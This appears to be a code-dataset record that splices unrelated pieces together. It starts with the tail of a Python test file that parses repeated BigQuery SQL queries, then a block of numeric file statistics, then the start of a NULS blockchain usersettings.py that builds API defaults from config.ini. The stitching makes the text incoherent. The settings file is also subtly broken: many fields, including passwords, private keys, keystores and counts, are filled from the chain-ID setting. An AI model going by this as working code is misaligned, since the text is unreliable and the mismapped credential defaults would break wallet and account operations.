SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
SELECT COUNT(*) FROM `triggeredmail.coach.aggregate_purchase_201708`
WHERE order_id IS NULL OR order_id = ''
SELECT identified.count / aggregate.count AS ratio FROM (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.aggregate_viewed_product_201708`
) AS aggregate, (
SELECT COUNT(*) AS count FROM `triggeredmail.coach.identified_viewed_product_201708`
) AS identified
"""
queries = [""]
for l in querytext.split("\n"):
if l.strip() == "":
queries.append("")
continue
queries[-1] += " " + l.strip()
queries = filter(bool, queries)
outputs = []
for q in queries:
try:
plan = parse(q)
except Exception as e:
print(q)
print()
raise e
if __name__ == '__main__':
unittest.main()
"""
import click
from parse_expr import parse as parse_expr
from parse_sql import parse as parse_sql
if __name__ == "__main__":
import click
@click.command()
@click.option("-e", type=str)
@click.option("-q", type=str)
def run(e=None, q=None):
if e:
print(e)
ast = parse_expr(e)
print(ast)
if q:
print(q)
ast = parse_sql(q)
print(ast)
run()
"""
| 40.113456
| 256
| 0.792015
| 2,173
| 15,203
| 5.361712
| 0.105384
| 0.059823
| 0.029268
| 0.039911
| 0.834692
| 0.830744
| 0.830229
| 0.82199
| 0.82199
| 0.804995
| 0
| 0.08744
| 0.119121
| 15,203
| 378
| 257
| 40.219577
| 0.782557
| 0.001842
| 0
| 0.594697
| 0
| 0.049242
| 0.927438
| 0.42364
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.049242
| null | null | 0.015152
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d5999d9c3cf2386cddbc851cf0ac0cbdd2131ad2
| 50,158
|
py
|
Python
|
src/modules/nulsws_python/user_settings/usersettings.py
|
nmschorr/mybackup
|
52d2d11b7da65b9802e74cb915ed2e8ae4f18d5c
|
[
"MIT"
] | 1
|
2019-12-13T09:17:56.000Z
|
2019-12-13T09:17:56.000Z
|
src/modules/nulsws_python/user_settings/usersettings.py
|
nmschorr/mybackup
|
52d2d11b7da65b9802e74cb915ed2e8ae4f18d5c
|
[
"MIT"
] | null | null | null |
src/modules/nulsws_python/user_settings/usersettings.py
|
nmschorr/mybackup
|
52d2d11b7da65b9802e74cb915ed2e8ae4f18d5c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.7
"""
by Nancy Schorr for Nuls, December 2019
"""
# change user_settings to suit
# for use in api calls
# fill in your default params here
from configparser import ConfigParser
class UserSettings(object):
def __init__(self):
config_parser = ConfigParser()
config_file = "user_settings/config.ini"
config_parser.read(config_file)
config_sections = config_parser.sections()
usr_config_ini_d = dict()
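# Flatten every section of config.ini into a single option -> value dictionary.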
for section in config_sections:
options_c = config_parser.options(section)
for op in options_c:
conf_val = config_parser.get(section, op)
usr_config_ini_d.update({op: conf_val})
self.usr_config_ini_d = usr_config_ini_d
ucid = usr_config_ini_d
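# Default parameters for each NULS API call, keyed as z<n>_<COMMAND>_<parameter>; every value is looked up in the flattened config.ini dictionary.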
self.user_set_dict = {
"z0_ADD_ADDRESS_PREFIX_prefix": ucid.get('my_addressprefix'),
"z1_AC_CREATE_ACCOUNT_chainId": ucid.get('my_chainid'),
"z1_AC_CREATE_ACCOUNT_count": ucid.get('my_chainid'),
"z1_AC_CREATE_ACCOUNT_password": ucid.get('my_password'),
"z2_AC_CREATE_CONTRACT_ACCOUNT_chainId": ucid.get('my_chainid'),
"z3_AC_CREATE_MULTI_SIGN_ACCOUNT_chainId": ucid.get('my_chainid'),
"z3_AC_CREATE_MULTI_SIGN_ACCOUNT_pubKeys": ucid.get('my_pubkeys'),
"z3_AC_CREATE_MULTI_SIGN_ACCOUNT_minSigns": ucid.get('my_minsigns'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_chainId": ucid.get('my_chainid'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_inputs": ucid.get('my_inputs'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_outputs": ucid.get('my_outputs'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_remark": ucid.get('my_remark'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_signAddress": ucid.get('my_address'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_signPassword": ucid.get('my_password'),
"z5_AC_CREATE_OFFLINE_ACCOUNT_chainId": ucid.get('my_chainid'),
"z5_AC_CREATE_OFFLINE_ACCOUNT_count": ucid.get('my_chainid'),
"z5_AC_CREATE_OFFLINE_ACCOUNT_password": ucid.get('my_chainid'),
"z6_AC_EXPORT_ACCOUNT_KEYSTORE_chainId": ucid.get('my_chainid'),
"z6_AC_EXPORT_ACCOUNT_KEYSTORE_address": ucid.get('my_address'),
"z6_AC_EXPORT_ACCOUNT_KEYSTORE_password": ucid.get('my_chainid'),
"z6_AC_EXPORT_ACCOUNT_KEYSTORE_filePath": ucid.get('my_chainid'),
"z7_AC_EXPORT_KEYSTORE_JSON_chainId": ucid.get('my_chainid'),
"z7_AC_EXPORT_KEYSTORE_JSON_address": ucid.get('my_address'),
"z7_AC_EXPORT_KEYSTORE_JSON_password": ucid.get('my_password'),
"z8_AC_GET_ACCOUNT_BYADDRESS_chainId": ucid.get('my_chainid'),
"z8_AC_GET_ACCOUNT_BYADDRESS_address": ucid.get('my_address'),
"z9_AC_GET_ACCOUNT_LIST_chainId": ucid.get('my_chainid'),
"z10_AC_GET_ADDRESS_LIST_chainId": ucid.get('my_chainid'),
"z10_AC_GET_ADDRESS_LIST_pageNumber": ucid.get('my_chainid'),
"z10_AC_GET_ADDRESS_LIST_pageSize": ucid.get('my_chainid'),
"z11_AC_GET_ADDRESS_PREFIX_BY_CHAINID_chainId": ucid.get('my_chainid'),
"z12_AC_GET_ALIASBY_ADDRESS_chainId": ucid.get('my_chainid'),
"z12_AC_GET_ALIASBY_ADDRESS_address": ucid.get('my_address'),
"z13_AC_GET_ALL_ADDRESS_PREFIX_chainId": ucid.get('my_chainid'),
"z14_AC_GET_ALL_PRIKEY_chainId": ucid.get('my_chainid'),
"z14_AC_GET_ALL_PRIKEY_password": ucid.get('my_password'),
"z15_AC_GET_ENCRYPTED_ADDRESS_LIST_chainId": ucid.get('my_chainid'),
"z16_AC_GET_MULTI_SIGN_ACCOUNT_chainId": ucid.get('my_chainid'),
"z16_AC_GET_MULTI_SIGN_ACCOUNT_address": ucid.get('my_address'),
"z17_AC_GET_PUBKEY_chainId": ucid.get('my_chainid'),
"z17_AC_GET_PUBKEY_address": ucid.get('my_address'),
"z17_AC_GET_PUBKEY_password": ucid.get('my_chainid'),
"z18_AC_IMPORT_ACCOUNT_BY_KEYSTORE_chainId": ucid.get('my_chainid'),
"z18_AC_IMPORT_ACCOUNT_BY_KEYSTORE_password": ucid.get('my_chainid'),
"z18_AC_IMPORT_ACCOUNT_BY_KEYSTORE_keyStore": ucid.get('my_chainid'),
"z18_AC_IMPORT_ACCOUNT_BY_KEYSTORE_overwrite": ucid.get('my_chainid'),
"z19_AC_IMPORT_ACCOUNT_BY_PRIKEY_chainId": ucid.get('my_chainid'),
"z19_AC_IMPORT_ACCOUNT_BY_PRIKEY_password": ucid.get('my_password'),
"z19_AC_IMPORT_ACCOUNT_BY_PRIKEY_priKey": ucid.get('my_chainid'),
"z19_AC_IMPORT_ACCOUNT_BY_PRIKEY_overwrite": ucid.get('my_chainid'),
"z20_AC_IS_ALIAS_USABLE_chainId": ucid.get('my_chainid'),
"z20_AC_IS_ALIAS_USABLE_alias": ucid.get('my_chainid'),
"z21_AC_IS_MULTISIGN_ACCOUNT_BUILDER_chainId": ucid.get('my_chainid'),
"z21_AC_IS_MULTISIGN_ACCOUNT_BUILDER_address": ucid.get('my_address'),
"z21_AC_IS_MULTISIGN_ACCOUNT_BUILDER_pubKey": ucid.get('my_chainid'),
"z22_AC_REMOVE_ACCOUNT_chainId": ucid.get('my_chainid'),
"z22_AC_REMOVE_ACCOUNT_address": ucid.get('my_address'),
"z22_AC_REMOVE_ACCOUNT_password": ucid.get('my_chainid'),
"z23_AC_REMOVE_MULTISIGN_ACCOUNT_chainId": ucid.get('my_chainid'),
"z23_AC_REMOVE_MULTISIGN_ACCOUNT_address": ucid.get('my_address'),
"z24_AC_SET_ALIAS_chainId": ucid.get('my_chainid'),
"z24_AC_SET_ALIAS_address": ucid.get('my_address'),
"z24_AC_SET_ALIAS_password": ucid.get('my_chainid'),
"z24_AC_SET_ALIAS_alias": ucid.get('my_chainid'),
"z25_AC_SET_MULTISIGN_ALIAS_chainId": ucid.get('my_chainid'),
"z25_AC_SET_MULTISIGN_ALIAS_address": ucid.get('my_address'),
"z25_AC_SET_MULTISIGN_ALIAS_alias": ucid.get('my_chainid'),
"z25_AC_SET_MULTISIGN_ALIAS_signAddress": ucid.get('my_address'),
"z25_AC_SET_MULTISIGN_ALIAS_signPassword": ucid.get('my_password'),
"z26_AC_SET_REMARK_chainId": ucid.get('my_chainid'),
"z26_AC_SET_REMARK_address": ucid.get('my_address'),
"z26_AC_SET_REMARK_remark": ucid.get('my_chainid'),
"z27_AC_SIGN_BLOCKDIGEST_chainId": ucid.get('my_chainid'),
"z27_AC_SIGN_BLOCKDIGEST_address": ucid.get('my_address'),
"z27_AC_SIGN_BLOCKDIGEST_password": ucid.get('my_chainid'),
"z27_AC_SIGN_BLOCKDIGEST_data": ucid.get('my_chainid'),
"z28_AC_SIGN_DIGEST_chainId": ucid.get('my_chainid'),
"z28_AC_SIGN_DIGEST_address": ucid.get('my_address'),
"z28_AC_SIGN_DIGEST_password": ucid.get('my_chainid'),
"z28_AC_SIGN_DIGEST_data": ucid.get('my_chainid'),
"z29_AC_SIGN_MULTISIGN_TRANSACTION_chainId": ucid.get('my_chainid'),
"z29_AC_SIGN_MULTISIGN_TRANSACTION_tx": ucid.get('my_chainid'),
"z29_AC_SIGN_MULTISIGN_TRANSACTION_signAddress": ucid.get('my_address'),
"z29_AC_SIGN_MULTISIGN_TRANSACTION_signPassword": ucid.get('my_password'),
"z30_AC_TRANSFER_chainId": ucid.get('my_chainid'),
"z30_AC_TRANSFER_inputs": ucid.get('my_inputs'),
"z30_AC_TRANSFER_outputs": ucid.get('my_outputs'),
"z30_AC_TRANSFER_remark": ucid.get('my_remark'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_chainId": ucid.get('my_chainid'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_address": ucid.get('my_address'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_password": ucid.get('my_chainid'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_newPassword": ucid.get('my_chainid'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_priKey": ucid.get('my_chainid'),
"z32_AC_UPDATE_PASSWORD_chainId": ucid.get('my_chainid'),
"z32_AC_UPDATE_PASSWORD_address": ucid.get('my_address'),
"z32_AC_UPDATE_PASSWORD_password": ucid.get('my_chainid'),
"z32_AC_UPDATE_PASSWORD_newPassword": ucid.get('my_chainid'),
"z33_AC_VALIDATION_PASSWORD_chainId": ucid.get('my_chainid'),
"z33_AC_VALIDATION_PASSWORD_address": ucid.get('my_address'),
"z33_AC_VALIDATION_PASSWORD_password": ucid.get('my_chainid'),
"z34_AC_VERIFY_SIGN_DATA_pubKey": ucid.get('my_chainid'),
"z34_AC_VERIFY_SIGN_DATA_sig": ucid.get('my_chainid'),
"z34_AC_VERIFY_SIGN_DATA_data": ucid.get('my_chainid'),
"z35_BATCH_VALIDATE_BEGIN_chainId": ucid.get('my_chainid'),
"z36_BLOCK_VALIDATE_chainId": ucid.get('my_chainid'),
"z36_BLOCK_VALIDATE_txList": ucid.get('my_chainid'),
"z38_CANCEL_CROSSCHAIN_chainId": ucid.get('my_chainid'),
"z38_CANCEL_CROSSCHAIN_assetId": ucid.get('my_chainid'),
"z39_CHECK_BLOCK_VERSION_chainId": ucid.get('my_chainid'),
"z39_CHECK_BLOCK_VERSION_extendsData": ucid.get('my_chainid'),
"z40_CM_ASSET_chainId": ucid.get('my_chainid'),
"z40_CM_ASSET_assetId": ucid.get('my_chainid'),
"z41_CM_ASSET_CIRCULATE_COMMIT_chainId": ucid.get('my_chainid'),
"z41_CM_ASSET_CIRCULATE_COMMIT_txList": ucid.get('my_chainid'),
"z41_CM_ASSET_CIRCULATE_COMMIT_blockHeader": ucid.get('my_chainid'),
"z42_CM_ASSET_CIRCULATE_ROLLBACK_chainId": ucid.get('my_chainid'),
"z42_CM_ASSET_CIRCULATE_ROLLBACK_txList": ucid.get('my_chainid'),
"z42_CM_ASSET_CIRCULATE_ROLLBACK_blockHeader": ucid.get('my_chainid'),
"z43_CM_ASSET_CIRCULATE_VALIDATOR_chainId": ucid.get('my_chainid'),
"z43_CM_ASSET_CIRCULATE_VALIDATOR_tx": ucid.get('my_chainid'),
"z44_CM_ASSET_DISABLE_chainId": ucid.get('my_chainid'),
"z44_CM_ASSET_DISABLE_assetId": ucid.get('my_chainid'),
"z44_CM_ASSET_DISABLE_address": ucid.get('my_address'),
"z44_CM_ASSET_DISABLE_password": ucid.get('my_password'),
"z45_CM_ASSET_REG_chainId": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_assetId": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_symbol": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_assetName": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_initNumber": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_decimalPlaces": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_address": ucid.get('my_address'),
"z45_CM_ASSET_REG_password": ucid.get('my_chainid'),
"z46_CM_CHAIN_chainId": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_chainId": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_chainName": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_addressType": ucid.get('my_address'),
"z47_CM_CHAIN_ACTIVE_addressPrefix": ucid.get('my_address'),
"z47_CM_CHAIN_ACTIVE_magicNumber": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_minAvailableNodeNum": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_assetId": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_symbol": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_assetName": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_initNumber": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_decimalPlaces": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_address": ucid.get('my_address'),
"z47_CM_CHAIN_ACTIVE_password": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_verifierList": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_signatureBFTRatio": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_maxSignatureCount": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_chainId": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_chainName": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_addressType": ucid.get('my_address'),
"z48_CM_CHAIN_REG_addressPrefix": ucid.get('my_address'),
"z48_CM_CHAIN_REG_magicNumber": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_minAvailableNodeNum": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_assetId": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_symbol": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_assetName": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_initNumber": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_decimalPlaces": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_address": ucid.get('my_address'),
"z48_CM_CHAIN_REG_password": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_verifierList": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_signatureBFTRatio": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_maxSignatureCount": ucid.get('my_chainid'),
"z49_CM_GET_CHAIN_ASSET_chainId": ucid.get('my_chainid'),
"z49_CM_GET_CHAIN_ASSET_assetChainId": ucid.get('my_chainid'),
"z49_CM_GET_CHAIN_ASSET_assetId": ucid.get('my_chainid'),
"z50_CM_GET_CIRCULATE_CHAIN_ASSET_circulateChainId": ucid.get('my_chainid'),
"z50_CM_GET_CIRCULATE_CHAIN_ASSET_assetChainId": ucid.get('my_chainid'),
"z50_CM_GET_CIRCULATE_CHAIN_ASSET_assetId": ucid.get('my_chainid'),
"z51_COMMIT_BATCH_UNCONFIRMED_TXS_chainId": ucid.get('my_chainid'),
"z51_COMMIT_BATCH_UNCONFIRMED_TXS_txList": ucid.get('my_chainid'),
"z52_COMMIT_BLOCKTXS_chainId": ucid.get('my_chainid'),
"z52_COMMIT_BLOCKTXS_txList": ucid.get('my_chainid'),
"z52_COMMIT_BLOCKTXS_blockHeight": ucid.get('my_chainid'),
"z53_COMMIT_UNCONFIRMEDTX_chainId": ucid.get('my_chainid'),
"z53_COMMIT_UNCONFIRMEDTX_tx": ucid.get('my_chainid'),
"z55_CREATE_AGENT_VALID_chainId": ucid.get('my_chainid'),
"z55_CREATE_AGENT_VALID_tx": ucid.get('my_chainid'),
"z56_CREATE_CROSSTX_chainId": ucid.get('my_chainid'),
"z56_CREATE_CROSSTX_listFrom": ucid.get('my_chainid'),
"z56_CREATE_CROSSTX_listTo": ucid.get('my_chainid'),
"z56_CREATE_CROSSTX_remark": ucid.get('my_chainid'),
"z57_CROSSCHAIN_REGISTER_CHANGE_chainId": ucid.get('my_chainid'),
"z58_CS_ADD_BLOCK_chainId": ucid.get('my_chainid'),
"z58_CS_ADD_BLOCK_blockHeader": ucid.get('my_chainid'),
"z59_CS_ADD_EVIDENCE_RECORD_chainId": ucid.get('my_chainid'),
"z59_CS_ADD_EVIDENCE_RECORD_blockHeader": ucid.get('my_chainid'),
"z59_CS_ADD_EVIDENCE_RECORD_evidenceHeader": ucid.get('my_chainid'),
"z60_CS_CHAIN_ROLLBACK_chainId": ucid.get('my_chainid'),
"z60_CS_CHAIN_ROLLBACK_height": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_chainId": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_agentHash": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_deposit": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_contractAddress": ucid.get('my_address'),
"z61_CS_CONTRACT_DEPOSIT_contractSender": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_contractBalance": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_contractNonce": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_blockTime": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_chainId": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_joinAgentHash": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_contractAddress": ucid.get('my_address'),
"z62_CS_CONTRACT_WITHDRAW_contractSender": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_contractBalance": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_contractNonce": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_blockTime": ucid.get('my_chainid'),
"z63_CS_CREATE_AGENT_chainId": ucid.get('my_chainid'),
"z63_CS_CREATE_AGENT_agentAddress": ucid.get('my_address'),
"z63_CS_CREATE_AGENT_packingAddress": ucid.get('my_address'),
"z63_CS_CREATE_AGENT_rewardAddress": ucid.get('my_address'),
"z63_CS_CREATE_AGENT_commissionRate": ucid.get('my_chainid'),
"z63_CS_CREATE_AGENT_deposit": ucid.get('my_chainid'),
"z63_CS_CREATE_AGENT_password": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_chainId": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_packingAddress": ucid.get('my_address'),
"z64_CS_CREATE_CONTRACT_AGENT_deposit": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_commissionRate": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_contractAddress": ucid.get('my_address'),
"z64_CS_CREATE_CONTRACT_AGENT_contractSender": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_contractBalance": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_contractNonce": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_blockTime": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_chainId": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_agentAddress": ucid.get('my_address'),
"z65_CS_CREATE_MULTI_AGENT_packingAddress": ucid.get('my_address'),
"z65_CS_CREATE_MULTI_AGENT_rewardAddress": ucid.get('my_address'),
"z65_CS_CREATE_MULTI_AGENT_commissionRate": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_deposit": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_password": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_signAddress": ucid.get('my_address'),
"z66_CS_DEPOSIT_TOAGENT_chainId": ucid.get('my_chainid'),
"z66_CS_DEPOSIT_TOAGENT_address": ucid.get('my_address'),
"z66_CS_DEPOSIT_TOAGENT_agentHash": ucid.get('my_chainid'),
"z66_CS_DEPOSIT_TOAGENT_deposit": ucid.get('my_chainid'),
"z66_CS_DEPOSIT_TOAGENT_password": ucid.get('my_chainid'),
"z67_CS_DOUBLE_SPEND_RECORD_chainId": ucid.get('my_chainid'),
"z67_CS_DOUBLE_SPEND_RECORD_block": ucid.get('my_chainid'),
"z67_CS_DOUBLE_SPEND_RECORD_tx": ucid.get('my_chainid'),
"z68_CS_GET_AGENT_ADDRESS_LIST_chainId": ucid.get('my_chainid'),
"z69_CS_GET_AGENT_CHANGE_INFO_chainId": ucid.get('my_chainid'),
"z70_CS_GET_AGENT_INFO_chainId": ucid.get('my_chainid'),
"z70_CS_GET_AGENT_INFO_agentHash": ucid.get('my_chainid'),
"z71_CS_GET_AGENT_LIST_chainId": ucid.get('my_chainid'),
"z71_CS_GET_AGENT_LIST_pageNumber": ucid.get('my_chainid'),
"z71_CS_GET_AGENT_LIST_pageSize": ucid.get('my_chainid'),
"z71_CS_GET_AGENT_LIST_keyWord": ucid.get('my_chainid'),
"z72_CS_GET_AGENT_STATUS_chainId": ucid.get('my_chainid'),
"z72_CS_GET_AGENT_STATUS_agentHash": ucid.get('my_chainid'),
"z73_CS_GET_CONSENSUS_CONFIG_chainId": ucid.get('my_chainid'),
"z74_CS_GET_CONTRACT_AGENT_INFO_chainId": ucid.get('my_chainid'),
"z74_CS_GET_CONTRACT_AGENT_INFO_agentHash": ucid.get('my_chainid'),
"z74_CS_GET_CONTRACT_AGENT_INFO_contractAddress": ucid.get('my_address'),
"z74_CS_GET_CONTRACT_AGENT_INFO_contractSender": ucid.get('my_chainid'),
"z75_CS_GET_CONTRACT_DEPOSIT_INFO_chainId": ucid.get('my_chainid'),
"z75_CS_GET_CONTRACT_DEPOSIT_INFO_joinAgentHash": ucid.get('my_chainid'),
"z75_CS_GET_CONTRACT_DEPOSIT_INFO_contractAddress": ucid.get('my_address'),
"z75_CS_GET_CONTRACT_DEPOSIT_INFO_contractSender": ucid.get('my_chainid'),
"z76_CS_GET_DEPOSIT_LIST_chainId": ucid.get('my_chainid'),
"z76_CS_GET_DEPOSIT_LIST_pageNumber": ucid.get('my_chainid'),
"z76_CS_GET_DEPOSIT_LIST_pageSize": ucid.get('my_chainid'),
"z76_CS_GET_DEPOSIT_LIST_address": ucid.get('my_address'),
"z76_CS_GET_DEPOSIT_LIST_agentHash": ucid.get('my_chainid'),
"z77_CS_GET_INFO_chainId": ucid.get('my_chainid'),
"z77_CS_GET_INFO_address": ucid.get('my_address'),
"z78_CS_GET_PACKER_INFO_chainId": ucid.get('my_chainid'),
"z79_CS_GET_PUBLISH_LIST_chainId": ucid.get('my_chainid'),
"z79_CS_GET_PUBLISH_LIST_address": ucid.get('my_address'),
"z79_CS_GET_PUBLISH_LIST_type": ucid.get('my_chainid'),
"z80_CS_GET_ROUND_INFO_chainId": ucid.get('my_chainid'),
"z81_CS_GET_ROUND_MEMBER_LIST_chainId": ucid.get('my_chainid'),
"z81_CS_GET_ROUND_MEMBER_LIST_extend": ucid.get('my_chainid'),
"z82_CS_GET_SEED_NODE_INFO_chainId": ucid.get('my_chainid'),
"z83_CS_GET_WHOLEINFO_chainId": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_chainId": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_address": ucid.get('my_address'),
"z84_CS_MULTI_DEPOSIT_agentHash": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_deposit": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_password": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_signAddress": ucid.get('my_address'),
"z85_CS_MULTI_WITHDRAW_chainId": ucid.get('my_chainid'),
"z85_CS_MULTI_WITHDRAW_address": ucid.get('my_address'),
"z85_CS_MULTI_WITHDRAW_txHash": ucid.get('my_chainid'),
"z85_CS_MULTI_WITHDRAW_password": ucid.get('my_chainid'),
"z85_CS_MULTI_WITHDRAW_signAddress": ucid.get('my_address'),
"z86_CS_RANDOM_RAW_SEEDS_COUNT_chainId": ucid.get('my_chainid'),
"z86_CS_RANDOM_RAW_SEEDS_COUNT_height": ucid.get('my_chainid'),
"z86_CS_RANDOM_RAW_SEEDS_COUNT_count": ucid.get('my_chainid'),
"z87_CS_RANDOM_RAW_SEEDS_HEIGHT_chainId": ucid.get('my_chainid'),
"z87_CS_RANDOM_RAW_SEEDS_HEIGHT_startHeight": ucid.get('my_chainid'),
"z87_CS_RANDOM_RAW_SEEDS_HEIGHT_endHeight": ucid.get('my_chainid'),
"z88_CS_RANDOM_SEED_COUNT_chainId": ucid.get('my_chainid'),
"z88_CS_RANDOM_SEED_COUNT_height": ucid.get('my_chainid'),
"z88_CS_RANDOM_SEED_COUNT_count": ucid.get('my_chainid'),
"z88_CS_RANDOM_SEED_COUNT_algorithm": ucid.get('my_chainid'),
"z89_CS_RANDOM_SEED_HEIGHT_chainId": ucid.get('my_chainid'),
"z89_CS_RANDOM_SEED_HEIGHT_startHeight": ucid.get('my_chainid'),
"z89_CS_RANDOM_SEED_HEIGHT_endHeight": ucid.get('my_chainid'),
"z89_CS_RANDOM_SEED_HEIGHT_algorithm": ucid.get('my_chainid'),
"z90_CS_RECEIVE_HEADERLIST_chainId": ucid.get('my_chainid'),
"z90_CS_RECEIVE_HEADERLIST_headerList": ucid.get('my_chainid'),
"z91_CS_RUN_CHAIN_chainId": ucid.get('my_chainid'),
"z92_CS_RUN_MAINCHAIN_chainId": ucid.get('my_chainid'),
"z93_CS_STOPAGENT_chainId": ucid.get('my_chainid'),
"z93_CS_STOPAGENT_address": ucid.get('my_address'),
"z93_CS_STOPAGENT_password": ucid.get('my_chainid'),
"z94_CS_STOP_AGENT_chainId": ucid.get('my_chainid'),
"z94_CS_STOP_AGENT_address": ucid.get('my_address'),
"z94_CS_STOP_AGENT_password": ucid.get('my_chainid'),
"z95_CS_STOPCHAIN_chainId": ucid.get('my_chainid'),
"z96_CS_STOP_CHAIN_chainId": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_chainId": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_contractAddress": ucid.get('my_address'),
"z97_CS_STOP_CONTRACT_AGENT_contractSender": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_contractBalance": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_contractNonce": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_blockTime": ucid.get('my_chainid'),
"z98_CS_STOP_MULTI_AGENT_chainId": ucid.get('my_chainid'),
"z98_CS_STOP_MULTI_AGENT_address": ucid.get('my_address'),
"z98_CS_STOP_MULTI_AGENT_password": ucid.get('my_chainid'),
"z98_CS_STOP_MULTI_AGENT_signAddress": ucid.get('my_address'),
"z99_CS_TRIGGER_COINBASE_CONTRACT_chainId": ucid.get('my_chainid'),
